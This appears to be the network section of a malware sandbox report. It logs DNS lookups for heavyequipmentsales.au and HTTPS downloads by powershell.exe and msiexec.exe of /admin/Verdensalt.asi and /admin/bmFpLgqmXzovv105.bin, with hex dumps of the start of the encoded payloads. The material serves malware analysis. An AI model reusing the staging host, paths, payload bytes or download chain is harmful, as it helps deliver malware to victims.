                                          Nov 18, 2024 18:12:37.284364939 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:37.333587885 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:37.333729982 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:37.335175037 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:37.335258961 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:37.335304976 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:37.335304976 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:37.347261906 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:37.347274065 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:37.347335100 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:37.347335100 CET49480443192.168.2.4203.170.87.17
                                          TimestampSource PortDest PortSource IPDest IP
                                          Nov 18, 2024 18:12:07.459783077 CET5890353192.168.2.41.1.1.1
                                          Nov 18, 2024 18:12:08.448923111 CET5890353192.168.2.41.1.1.1
                                          Nov 18, 2024 18:12:08.455904007 CET53589031.1.1.1192.168.2.4
                                          Nov 18, 2024 18:12:08.471498013 CET53589031.1.1.1192.168.2.4
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Nov 18, 2024 18:12:07.459783077 CET192.168.2.41.1.1.10x9286Standard query (0)heavyequipmentsales.auA (IP address)IN (0x0001)false
                                          Nov 18, 2024 18:12:08.448923111 CET192.168.2.41.1.1.10x9286Standard query (0)heavyequipmentsales.auA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Nov 18, 2024 18:12:03.294667006 CET1.1.1.1192.168.2.40x2250No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                          Nov 18, 2024 18:12:03.294667006 CET1.1.1.1192.168.2.40x2250No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                          Nov 18, 2024 18:12:08.471498013 CET1.1.1.1192.168.2.40x9286No error (0)heavyequipmentsales.au203.170.87.17A (IP address)IN (0x0001)false
                                          • heavyequipmentsales.au
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.449473203.170.87.174436776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 17:12:10 UTC186OUTGET /admin/Verdensalt.asi HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                          Host: heavyequipmentsales.au
                                          Connection: Keep-Alive
                                          2024-11-18 17:12:10 UTC209INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 17:12:11 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Last-Modified: Mon, 18 Nov 2024 12:01:26 GMT
                                          Accept-Ranges: bytes
                                          Content-Length: 460172
                                          2024-11-18 17:12:10 UTC7983INData Raw: 36 77 4a 35 53 2b 73 43 65 37 71 37 76 2f 38 4e 41 48 45 42 6d 33 45 42 6d 77 4e 63 4a 41 52 78 41 5a 76 72 41 75 37 64 75 56 44 64 4d 53 50 72 41 6f 75 4e 36 77 4b 63 2b 6f 48 78 73 59 4b 77 62 48 45 42 6d 33 45 42 6d 34 48 70 34 56 2b 42 54 33 45 42 6d 2b 73 43 64 47 35 78 41 5a 76 72 41 6b 2f 51 75 72 44 44 39 73 4e 78 41 5a 76 72 41 68 79 34 36 77 4b 77 4d 2b 73 43 33 66 41 78 79 75 73 43 6b 51 78 78 41 5a 75 4a 46 41 76 72 41 6c 50 54 36 77 4b 64 30 74 48 69 36 77 49 36 38 65 73 43 50 4e 36 44 77 51 54 72 41 6b 5a 58 36 77 4a 46 79 49 48 35 41 53 50 32 41 48 7a 48 63 51 47 62 63 51 47 62 69 30 51 6b 42 4f 73 43 78 53 35 78 41 5a 75 4a 77 33 45 42 6d 2b 73 43 52 58 4b 42 77 39 55 33 72 51 42 78 41 5a 74 78 41 5a 75 36 75 4d 32 42 63 58 45 42 6d 2b 73
                                          Data Ascii: 6wJ5S+sCe7q7v/8NAHEBm3EBmwNcJARxAZvrAu7duVDdMSPrAouN6wKc+oHxsYKwbHEBm3EBm4Hp4V+BT3EBm+sCdG5xAZvrAk/QurDD9sNxAZvrAhy46wKwM+sC3fAxyusCkQxxAZuJFAvrAlPT6wKd0tHi6wI68esCPN6DwQTrAkZX6wJFyIH5ASP2AHzHcQGbcQGbi0QkBOsCxS5xAZuJw3EBm+sCRXKBw9U3rQBxAZtxAZu6uM2BcXEBm+s
                                          2024-11-18 17:12:10 UTC8000INData Raw: 64 67 30 45 44 6a 74 68 4f 66 62 75 31 33 76 50 45 68 34 6b 30 67 5a 53 6d 6c 59 54 31 62 77 4d 58 62 4a 2b 53 37 5a 4d 33 73 51 35 4f 57 63 43 6d 33 5a 31 48 70 54 30 52 41 46 57 74 49 48 77 76 65 55 69 53 30 36 53 77 4d 4f 35 36 4e 32 30 51 53 78 58 76 57 6d 4a 78 50 46 51 69 43 75 75 55 64 6f 46 65 74 59 59 42 72 77 6e 31 74 58 72 6b 4a 44 74 58 45 66 4e 6f 53 78 62 6b 68 55 4d 73 31 62 2b 6d 6a 44 61 47 79 47 47 6d 64 6b 2f 2b 32 49 31 68 4a 7a 6c 41 51 59 37 50 78 78 75 41 6f 41 43 74 53 61 76 79 7a 46 79 48 63 65 39 7a 45 41 43 74 48 50 4d 42 66 46 52 48 61 64 59 49 73 49 54 39 35 46 31 68 39 2b 4f 71 2b 72 47 30 52 78 50 43 58 33 59 46 46 68 69 58 53 42 68 54 41 78 34 33 67 48 77 4e 42 56 78 41 70 57 59 44 49 66 34 4f 5a 55 72 65 46 52 70 42 31 43
                                          Data Ascii: dg0EDjthOfbu13vPEh4k0gZSmlYT1bwMXbJ+S7ZM3sQ5OWcCm3Z1HpT0RAFWtIHwveUiS06SwMO56N20QSxXvWmJxPFQiCuuUdoFetYYBrwn1tXrkJDtXEfNoSxbkhUMs1b+mjDaGyGGmdk/+2I1hJzlAQY7PxxuAoACtSavyzFyHce9zEACtHPMBfFRHadYIsIT95F1h9+Oq+rG0RxPCX3YFFhiXSBhTAx43gHwNBVxApWYDIf4OZUreFRpB1C
                                          2024-11-18 17:12:11 UTC8000INData Raw: 54 68 74 54 66 48 4d 33 36 58 6a 54 39 67 42 6c 51 2f 31 33 4c 5a 50 4d 4c 59 73 41 49 47 42 43 4f 2b 6c 34 42 72 43 2f 4f 44 49 61 6a 7a 68 2f 43 62 35 56 43 70 77 53 4f 75 76 2b 4e 4a 6b 74 2b 4c 68 58 39 65 7a 70 6c 49 55 6a 54 32 4f 43 50 46 43 30 78 58 49 49 4e 44 61 65 78 41 4a 6a 61 5a 6f 51 58 58 4c 4b 62 35 50 6c 34 31 37 65 5a 64 59 46 65 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41
                                          Data Ascii: ThtTfHM36XjT9gBlQ/13LZPMLYsAIGBCO+l4BrC/ODIajzh/Cb5VCpwSOuv+NJkt+LhX9ezplIUjT2OCPFC0xXIINDaexAJjaZoQXXLKb5Pl417eZdYFeAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAA
                                          2024-11-18 17:12:11 UTC8000INData Raw: 64 64 49 46 65 33 58 53 42 58 74 31 30 67 5a 32 44 6a 30 5a 50 6e 72 61 6e 54 72 4b 56 37 71 4a 55 36 55 31 66 33 58 51 4b 51 49 34 6b 4f 58 7a 30 6e 2f 70 72 74 77 57 5a 47 66 44 6e 45 36 7a 68 2f 62 6d 78 74 56 55 78 59 75 4b 78 37 50 5a 6a 54 71 45 51 78 4e 4f 48 33 55 50 69 73 70 42 57 70 37 46 78 66 31 66 70 41 34 51 38 70 59 58 47 35 72 31 51 68 75 51 66 35 43 47 44 66 32 62 48 4d 4d 68 66 73 63 44 5a 31 55 43 34 67 46 37 64 65 34 47 42 47 48 53 42 58 74 31 30 67 56 37 64 64 49 46 65 33 58 53 42 58 74 31 30 67 56 37 64 73 56 68 58 43 36 4f 53 76 69 57 41 33 70 41 69 77 58 6c 65 33 58 52 4e 49 52 2f 74 47 32 30 2f 43 43 33 4e 37 49 45 67 79 4e 6c 33 70 71 31 71 65 67 70 4b 30 6e 5a 44 4e 78 6c 51 54 6e 61 79 75 4c 39 43 54 2f 64 70 49 71 78 77 67 64
                                          Data Ascii: ddIFe3XSBXt10gZ2Dj0ZPnranTrKV7qJU6U1f3XQKQI4kOXz0n/prtwWZGfDnE6zh/bmxtVUxYuKx7PZjTqEQxNOH3UPispBWp7Fxf1fpA4Q8pYXG5r1QhuQf5CGDf2bHMMhfscDZ1UC4gF7de4GBGHSBXt10gV7ddIFe3XSBXt10gV7dsVhXC6OSviWA3pAiwXle3XRNIR/tG20/CC3N7IEgyNl3pq1qegpK0nZDNxlQTnayuL9CT/dpIqxwgd
                                          2024-11-18 17:12:11 UTC8000INData Raw: 5a 64 49 36 5a 35 41 6d 42 58 74 31 30 67 56 37 64 64 49 46 65 33 58 53 42 58 74 31 30 67 56 37 64 64 46 62 54 78 7a 79 73 59 53 79 75 63 63 73 69 35 4c 4f 43 71 62 37 66 72 58 67 68 49 41 70 62 67 53 63 4e 5a 74 52 2b 58 42 33 31 63 69 58 64 66 54 50 66 4c 73 75 6d 51 75 48 31 61 6a 6f 4b 59 38 38 4a 51 66 31 6d 56 38 4c 70 75 4a 79 70 63 48 42 41 74 41 4a 48 70 52 44 47 49 57 76 7a 75 6e 6e 52 46 7a 32 45 66 70 47 55 79 51 41 6e 58 42 6b 74 57 59 72 65 32 68 77 76 43 73 4e 42 64 49 46 65 56 67 6d 68 33 78 70 4f 71 49 58 5a 39 57 35 6b 32 4b 2b 46 6b 70 64 2f 49 6c 6b 72 49 68 6e 58 71 38 48 58 76 74 6a 33 39 47 37 5a 58 65 6c 30 4a 65 30 4d 6e 59 6c 34 62 52 6b 37 4a 41 54 32 57 45 78 31 5a 52 70 7a 4f 70 4a 34 49 64 48 6d 4b 4c 48 4a 44 75 68 4e 47 71
                                          Data Ascii: ZdI6Z5AmBXt10gV7ddIFe3XSBXt10gV7ddFbTxzysYSyuccsi5LOCqb7frXghIApbgScNZtR+XB31ciXdfTPfLsumQuH1ajoKY88JQf1mV8LpuJypcHBAtAJHpRDGIWvzunnRFz2EfpGUyQAnXBktWYre2hwvCsNBdIFeVgmh3xpOqIXZ9W5k2K+Fkpd/IlkrIhnXq8HXvtj39G7ZXel0Je0MnYl4bRk7JAT2WEx1ZRpzOpJ4IdHmKLHJDuhNGq
                                          2024-11-18 17:12:11 UTC8000INData Raw: 64 64 49 46 65 33 58 53 42 58 74 32 31 53 59 73 45 77 63 48 50 48 53 76 44 45 35 77 33 55 73 42 63 68 6e 4e 4c 4b 4b 52 4e 66 76 48 52 74 4f 52 43 56 68 45 34 79 2f 55 39 44 6d 6e 68 56 4f 2b 46 62 54 68 77 42 76 70 41 72 79 58 39 39 49 61 32 32 4b 79 47 7a 73 45 54 4e 4a 31 37 52 6d 32 75 64 49 46 65 33 58 53 42 58 74 31 30 67 56 37 64 64 49 46 65 33 58 53 42 58 74 32 78 7a 53 46 48 61 35 6a 4b 41 53 54 36 44 56 79 32 69 6a 30 33 4b 34 35 66 4c 58 79 42 58 74 31 30 67 56 37 64 64 49 46 65 33 58 53 42 58 74 31 30 67 56 37 64 64 45 4d 42 2f 6c 38 57 6a 54 51 79 39 61 65 4a 73 39 50 56 53 42 53 44 58 74 33 39 61 39 38 66 36 49 46 65 33 66 30 63 61 4e 39 30 67 64 63 4f 75 4a 73 70 36 58 34 66 54 39 70 6a 39 4a 4b 62 6e 76 47 78 79 6c 70 42 36 34 64 61 41 4a
                                          Data Ascii: ddIFe3XSBXt21SYsEwcHPHSvDE5w3UsBchnNLKKRNfvHRtORCVhE4y/U9DmnhVO+FbThwBvpAryX99Ia22KyGzsETNJ17Rm2udIFe3XSBXt10gV7ddIFe3XSBXt2xzSFHa5jKAST6DVy2ij03K45fLXyBXt10gV7ddIFe3XSBXt10gV7ddEMB/l8WjTQy9aeJs9PVSBSDXt39a98f6IFe3f0caN90gdcOuJsp6X4fT9pj9JKbnvGxylpB64daAJ
                                          2024-11-18 17:12:11 UTC8000INData Raw: 59 57 71 54 2f 78 69 4d 64 31 7a 70 39 68 73 4e 59 74 66 70 64 32 7a 59 7a 6b 79 51 57 78 2b 76 70 42 69 43 75 41 5a 48 43 5a 6f 44 33 7a 72 62 6b 49 30 54 41 32 6a 4a 54 62 72 36 73 75 6b 36 64 49 7a 36 2f 33 58 53 42 33 79 49 4c 4b 77 62 61 65 77 7a 32 39 6e 43 42 41 59 4a 4d 53 77 62 6f 58 4e 50 79 43 79 4d 2b 32 58 36 6b 36 4e 38 71 33 32 74 69 37 50 56 75 31 6c 79 66 32 64 66 69 6c 7a 4f 6d 41 31 39 33 7a 2b 4f 4e 61 34 4a 50 79 79 2f 6b 38 4a 72 38 71 58 31 52 74 6f 74 5a 69 69 57 61 6a 58 4b 6b 57 53 45 7a 62 32 68 59 66 62 74 74 71 47 63 37 32 51 54 49 37 63 36 39 34 39 35 72 63 6b 44 72 30 4e 4a 31 6d 4f 6a 64 64 49 46 65 33 58 53 42 58 74 31 30 67 56 37 64 64 49 46 65 33 58 53 42 58 69 59 79 4d 47 49 55 63 61 2b 6f 50 4a 54 52 31 56 6a 6f 67 46
                                          Data Ascii: YWqT/xiMd1zp9hsNYtfpd2zYzkyQWx+vpBiCuAZHCZoD3zrbkI0TA2jJTbr6suk6dIz6/3XSB3yILKwbaewz29nCBAYJMSwboXNPyCyM+2X6k6N8q32ti7PVu1lyf2dfilzOmA193z+ONa4JPyy/k8Jr8qX1RtotZiiWajXKkWSEzb2hYfbttqGc72QTI7c69495rckDr0NJ1mOjddIFe3XSBXt10gV7ddIFe3XSBXiYyMGIUca+oPJTR1VjogF
                                          2024-11-18 17:12:11 UTC8000INData Raw: 38 2f 51 54 4e 33 48 53 42 72 64 4b 7a 73 46 37 64 64 49 46 65 33 58 53 42 58 74 31 30 67 56 37 64 64 49 46 65 33 58 53 42 6c 74 53 47 75 7a 6e 55 56 4a 62 54 62 71 46 56 47 56 6a 37 4a 55 35 6d 79 47 56 35 6c 38 77 48 56 7a 74 70 30 2b 52 30 61 58 4b 4b 58 49 61 47 38 52 54 73 41 4b 78 7a 78 37 73 53 6a 75 67 49 76 64 52 6e 48 44 6a 6b 75 76 68 50 36 4d 56 75 7a 38 4e 47 6c 74 38 39 78 51 46 7a 56 72 4e 6a 47 43 52 56 4e 78 2f 4a 33 56 54 2b 6b 46 31 33 4a 5a 36 31 75 4b 73 53 7a 67 34 77 4c 58 73 5a 4e 6c 55 33 62 31 41 37 6e 68 34 6e 73 66 52 2f 2f 59 62 30 66 6f 36 48 51 65 47 41 30 75 44 52 35 6b 72 61 77 4c 54 6f 37 70 55 6f 66 6e 47 33 59 57 74 73 68 4f 50 61 5a 68 38 49 51 66 31 6e 58 39 76 70 42 4a 57 6f 66 48 62 45 52 6b 74 59 51 50 4a 52 69 76
                                          Data Ascii: 8/QTN3HSBrdKzsF7ddIFe3XSBXt10gV7ddIFe3XSBltSGuznUVJbTbqFVGVj7JU5myGV5l8wHVztp0+R0aXKKXIaG8RTsAKxzx7sSjugIvdRnHDjkuvhP6MVuz8NGlt89xQFzVrNjGCRVNx/J3VT+kF13JZ61uKsSzg4wLXsZNlU3b1A7nh4nsfR//Yb0fo6HQeGA0uDR5krawLTo7pUofnG3YWtshOPaZh8IQf1nX9vpBJWofHbERktYQPJRiv
                                          2024-11-18 17:12:11 UTC8000INData Raw: 63 6e 65 58 76 39 4d 71 34 6c 6c 62 35 51 6c 2f 64 64 50 56 62 4e 61 33 31 58 74 30 6a 50 6c 59 73 78 45 54 66 4b 6b 63 61 7a 59 4c 31 64 67 44 63 35 4e 62 66 4d 68 48 72 37 52 41 6d 48 64 63 2f 66 62 76 44 57 49 66 35 52 34 55 4c 47 67 36 54 39 65 50 4f 5a 37 39 49 50 55 34 6b 56 72 32 41 34 35 49 6e 6f 30 74 45 41 46 6c 53 6d 6f 78 4f 4c 47 76 4b 6e 2f 46 52 42 4c 76 78 55 77 46 65 43 66 56 66 30 76 46 78 54 4e 31 30 30 4f 65 76 6d 4e 37 44 58 49 55 32 47 37 32 54 41 4c 65 46 54 33 78 62 58 49 58 71 4f 5a 38 41 43 45 2f 59 52 41 34 38 65 37 69 4c 4d 7a 66 64 61 77 53 54 76 79 54 49 37 32 46 4c 62 4b 53 56 52 63 6a 41 4c 56 41 32 32 63 77 52 46 49 53 4c 4e 4d 72 64 64 49 47 68 71 42 78 70 42 37 4a 30 67 64 64 59 6e 49 42 65 33 63 78 54 38 77 35 4a 30 4f
                                          Data Ascii: cneXv9Mq4llb5Ql/ddPVbNa31Xt0jPlYsxETfKkcazYL1dgDc5NbfMhHr7RAmHdc/fbvDWIf5R4ULGg6T9ePOZ79IPU4kVr2A45Ino0tEAFlSmoxOLGvKn/FRBLvxUwFeCfVf0vFxTN100OevmN7DXIU2G72TALeFT3xbXIXqOZ8ACE/YRA48e7iLMzfdawSTvyTI72FLbKSVRcjALVA22cwRFISLNMrddIGhqBxpB7J0gddYnIBe3cxT8w5J0O
                                          2024-11-18 17:12:11 UTC8000INData Raw: 4f 52 39 6c 6d 48 79 35 4e 6d 58 37 61 76 6f 57 2f 76 63 43 55 77 6c 55 62 4d 68 35 59 64 74 43 6b 37 4b 45 50 73 63 52 50 62 57 34 49 4e 76 6f 73 77 6a 6c 44 34 77 68 55 71 48 77 36 66 75 74 70 64 49 46 65 55 76 47 35 58 39 31 30 6a 70 6e 72 56 6f 46 65 33 58 53 42 58 74 31 30 67 56 37 64 64 49 46 65 33 58 53 42 58 74 31 30 51 47 2b 4c 6a 4c 48 69 58 54 6e 64 62 30 71 59 47 30 74 38 4a 44 6d 4f 67 59 43 73 61 32 62 71 63 74 44 6f 72 75 35 4c 45 31 6b 77 38 73 38 5a 30 73 4a 55 6c 34 68 64 51 42 49 45 6f 61 56 79 72 35 4c 6b 36 62 41 31 34 78 64 6a 43 6a 37 75 56 41 59 6c 6c 34 38 74 42 73 79 59 65 78 62 61 6f 57 61 4b 55 58 71 2b 57 6a 6d 66 57 43 36 78 54 68 57 37 76 32 55 49 34 78 49 45 6c 49 62 77 57 41 59 69 77 62 6c 66 33 58 52 4e 39 38 63 30 4f 4a
                                          Data Ascii: OR9lmHy5NmX7avoW/vcCUwlUbMh5YdtCk7KEPscRPbW4INvoswjlD4whUqHw6futpdIFeUvG5X910jpnrVoFe3XSBXt10gV7ddIFe3XSBXt10QG+LjLHiXTndb0qYG0t8JDmOgYCsa2bqctDoru5LE1kw8s8Z0sJUl4hdQBIEoaVyr5Lk6bA14xdjCj7uVAYll48tBsyYexbaoWaKUXq+WjmfWC6xThW7v2UI4xIElIbwWAYiwblf3XRN98c0OJ


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.449480203.170.87.174435568C:\Windows\SysWOW64\msiexec.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 17:12:35 UTC193OUTGET /admin/bmFpLgqmXzovv105.bin HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                          Host: heavyequipmentsales.au
                                          Cache-Control: no-cache
                                          2024-11-18 17:12:35 UTC249INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 17:12:35 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Last-Modified: Mon, 18 Nov 2024 11:57:45 GMT
                                          Accept-Ranges: bytes
                                          Content-Length: 287296
                                          Content-Type: application/octet-stream
                                          2024-11-18 17:12:35 UTC7943INData Raw: ac a5 81 a8 52 27 19 58 e7 c8 73 8d 7b c8 72 e8 87 b5 05 f3 90 7c 83 4f e3 e8 ca 27 7b a8 1e c2 77 12 45 e4 bf 11 79 43 2c 3c c8 65 76 e2 8c 6c ba 61 95 5c ae d4 e6 19 36 c8 8a 4d e4 90 cc 63 d1 c6 b5 5d d6 99 8a 75 08 e3 7e c3 0a 71 c6 7a 1a c1 a3 7b ee c5 27 ab 32 33 d1 f9 9a 93 5e 1b 84 94 16 0f 6c 18 67 d8 3a 1a a3 64 3b d1 be 6e dc 2d 1f 2e 4c 1c da 2f 11 99 dd 73 18 75 8c b4 7b a9 53 0c b4 6d 5d 32 06 03 a0 10 9e 8e a7 b4 ba 17 ec 11 e5 ec 28 a1 dd 59 3b 51 b9 ff d2 8e 9b 99 52 c1 66 73 1f 0d 26 1c c1 30 81 ad c2 db d2 1f b0 e9 77 98 42 4f d0 49 34 9d 8b 3a 0e 05 f2 5e d1 4f a0 f4 3e 75 92 66 f3 4e 70 dd 5b bf 74 49 6f 4c 9d 89 3c be 87 c5 8a 34 52 b8 01 f9 61 ef 2a f0 fa 9a da 15 97 72 c6 5d ce 31 37 c6 24 76 aa 2e 1a 1a e8 69 c4 e8 21 13 c4 fd 6d
                                          Data Ascii: R'Xs{r|O'{wEyC,<evla\6Mc]u~qz{'23^lg:d;n-.L/su{Sm]2(Y;QRfs&0wBOI4:^O>ufNp[tIoL<4Ra*r]17$v.i!m
                                          2024-11-18 17:12:35 UTC8000INData Raw: b7 34 b7 da 05 ee 7a d8 5e 87 27 22 2f 00 89 30 43 7c 40 4c ef b9 75 47 fa 97 27 5a 6e e9 ba 32 31 5f 6b 70 f9 6f 16 9d 8f 0a c2 e7 5d eb ce 6f a4 da f6 23 1a 78 94 4c d8 a2 e6 4f 8e 62 4a 79 9f 39 3b 68 72 bf 80 97 b7 a1 fb 89 e1 de 6b 6a 01 30 6b 40 cb 35 fe ce 5a bb 2b 2d a1 91 f8 19 5e 05 72 b1 9d 86 4a b4 0b 55 9a a2 0d c9 d3 42 e2 5c 7c c0 cc c8 0d 22 8e e2 c9 d3 7c b3 5e 62 ab d1 44 41 2e df 45 7c bf 5d 71 21 a1 d9 9f 8e 3e 43 81 d8 cf 06 bf 4e 46 12 3d 72 00 d3 cb f0 2e bf c6 a4 65 dc cb 99 f0 c0 d0 ef d8 d4 5e 2a 96 e9 5e 04 31 6f 60 fc 53 b8 d8 20 26 02 ee fe 21 d8 c6 6b de 88 20 94 0c a9 0e f8 24 2e 64 a5 5e 7d fd c8 0e f2 4d 58 ad 15 34 56 89 45 e3 d2 3d a4 be d0 4e 64 19 0d 0f 5c 46 15 24 e4 8a 03 68 bf b2 ab c4 e0 fb 36 40 00 09 56 1c 94 47
                                          Data Ascii: 4z^'"/0C|@LuG'Zn21_kpo]o#xLObJy9;hrkj0k@5Z+-^rJUB\|"|^bDA.E|]q!>CNF=r.e^*^1o`S &!k $.d^}MX4VE=Nd\F$h6@VG
                                          2024-11-18 17:12:35 UTC8000INData Raw: a5 30 48 f9 bb f6 d6 5b 9d 76 16 ca 17 d2 78 43 49 d6 ec 9c 39 83 6a 02 85 8e 85 90 02 a6 17 15 b8 e2 81 31 71 c2 dd e3 0a 2b ea 0a 47 59 ea bd 10 39 f5 1e b3 d9 18 a6 8b e2 c9 9f 37 6a 62 98 fd 76 58 d8 a7 42 bd cc d9 41 98 ba 1c 87 fb 29 68 68 19 6f 59 8a 69 56 6f 27 ad c1 66 c5 95 54 ef cb d2 72 0d f6 f5 ca c0 16 bc 26 a7 0e 1c 5e 85 b5 e0 88 3d 24 65 a4 ee 94 95 94 b2 aa 2d 27 04 c3 70 7f 40 b2 33 68 6b fd 99 41 25 f7 90 78 c6 f5 6d a6 c5 5a 13 e3 b9 dc 05 91 74 e0 41 e1 5a e1 02 8d 79 33 a9 e1 bc 2c bd 66 df 77 d5 53 42 57 3a e0 01 bf 0c e6 d3 9e 35 42 40 2f 58 7d 3d 6f 04 d8 d2 3b 3c c6 93 78 a1 f3 7a 87 65 88 50 84 5f a5 33 dd ed b4 5c 08 63 5f be ff b4 a0 07 1f 1b 82 28 95 57 d1 52 39 9d b8 ca 00 7d 8a 2d f1 88 d3 de 6f c4 81 d8 68 64 3b e8 a9 51
                                          Data Ascii: 0H[vxCI9j1q+GY97jbvXBA)hhoYiVo'fTr&^=$e-'p@3hkA%xmZtAZy3,fwSBW:5B@/X}=o;<xzeP_3\c_(WR9}-ohd;Q
                                          2024-11-18 17:12:35 UTC8000INData Raw: 9c 2f b5 aa 36 ad 62 26 5e 0a f9 e7 6f e1 19 0f e3 32 14 31 01 22 b0 66 ab d1 22 46 d7 91 f0 b3 66 f5 7c 3e d0 de ce 29 4b a7 e1 d7 f4 67 60 60 b8 29 ef 72 ed 38 61 1f 04 02 18 09 ad 1e c2 0e 04 e5 ae b6 26 47 52 66 4d 47 ed 43 e1 49 bb c5 03 a8 bc 66 31 40 ea 43 75 30 55 6f a9 89 21 5a 26 b3 e8 96 da e4 04 2e 54 77 15 82 e5 59 62 d0 20 e2 63 31 f0 99 10 f1 2a 6b f7 e0 b6 91 5c 24 50 70 af f1 b2 60 63 6a 9f da 29 be 24 29 af 08 10 97 80 65 9b 83 fe 92 70 be d0 26 bb 38 32 60 d7 a8 bd 59 9f 21 46 69 dd ae 51 c0 a7 e1 f3 cf e2 7f b5 7e e2 c5 35 22 fc 1f fa 04 1b ea 58 62 9a e7 65 5a 39 24 27 69 ee af ab 8c ea 9e 20 2c a6 22 4d c1 60 68 7a 4d 3e aa a4 6a 6c 79 8c 1b 43 97 7e 01 7b ee a5 24 a2 b4 18 1a bb f2 56 49 e4 71 a0 51 35 6e 4b f3 61 c5 b2 8a 6d db 95
                                          Data Ascii: /6b&^o21"f"Ff|>)Kg``)r8a&GRfMGCIf1@Cu0Uo!Z&.TwYb c1*k\$Pp`cj)$)ep&82`Y!FiQ~5"XbeZ9$'i ,"M`hzM>jlyC~{$VIqQ5nKam
                                          2024-11-18 17:12:35 UTC8000INData Raw: 27 67 b3 41 37 e9 3f 2c 0d c4 72 cb 08 41 a5 19 57 ae 78 84 97 22 27 21 4a 07 b5 3a b3 62 b2 cc 15 3d e1 87 ed 59 ca db db 70 6d 9e bb a0 29 f4 6b c6 b6 51 93 dc eb 1d 81 fa c0 9e 59 84 82 eb 53 3c f5 74 04 eb 58 1f 2e a0 39 52 65 27 cc 68 74 e3 6a 0f e8 3c 05 d4 91 94 9c ac e5 a3 81 16 9e c0 e6 4a d8 f0 66 0b 68 e5 dc a0 01 95 4f 86 cc ac bb 73 c4 84 8a 07 3b a7 e5 8f 32 b2 df ce ec 10 6f 24 2b 03 29 fc 79 7e 9d d7 4a cc 1c 80 e9 84 d6 d9 e4 ed 38 22 6a 1f bf 9b 12 79 9b d5 4b 23 7a fb da 44 6f a5 5e 82 e4 21 7a ac c0 3c e0 39 5e bc ef ff fd 22 67 f3 c2 50 80 d9 bc 82 5f 22 59 77 34 45 ec 4f d3 56 8f fa f7 b0 d3 f1 1a 91 27 e9 dd 60 6e 8b 7d 5a e0 10 2c e5 0a 8a 34 62 6e c3 b7 0d 35 73 db c5 48 f4 94 37 24 b3 1b 00 8f c9 b4 ae 4b 0d cd c6 dc ad 0f 54 c7
                                          Data Ascii: 'gA7?,rAWx"'!J:b=Ypm)kQYS<tX.9Re'htj<JfhOs;2o$+)y~J8"jyK#zDo^!z<9^"gP_"Yw4EOV'`n}Z,4bn5sH7$KT
                                          2024-11-18 17:12:35 UTC8000INData Raw: 5e 40 2e e5 2a 97 fb 85 89 72 42 21 fa 29 e7 4a e8 7f 2a 84 a0 ba f5 c9 c5 4f c7 b2 2c 2d c4 d7 12 2b fd dd 92 cd 1a bf c3 4a a4 70 e1 02 c1 a5 2d 19 72 d3 12 b6 c7 14 95 fd 46 92 d7 82 ec cb 1f 03 d1 7a 26 2a 2b e7 42 da ed 64 aa a8 67 83 6b 58 aa 18 db 1d 3f 37 e6 bf 46 d4 6c 26 ab de 91 56 a0 3c f8 81 71 ae cf 9d bc e8 7e a5 d4 15 28 68 84 e4 8d ab 46 cc 67 a1 2f bf bf 7d 63 d8 01 76 c2 30 6f a6 a2 12 32 ff 8f 3a 29 34 16 db 92 9d 9f 58 35 08 6f 84 33 9e 4c f7 eb 61 8c e5 90 68 ce ee 4a 7a f4 44 92 8b b0 09 d1 55 a4 7f 8a 4c 56 18 dd 96 c4 0b f2 95 92 e1 f9 92 27 1a fe f6 4f f5 b4 82 78 f3 e3 85 e0 cf a2 b8 c5 15 c6 86 fb d6 5a c5 4e ba b9 47 05 88 c8 ec f4 3d b8 a7 78 3f 2f cc ed 98 58 6e 42 54 c9 86 f8 c8 c6 f8 18 55 0b 26 ab e2 24 09 81 84 67 83 17
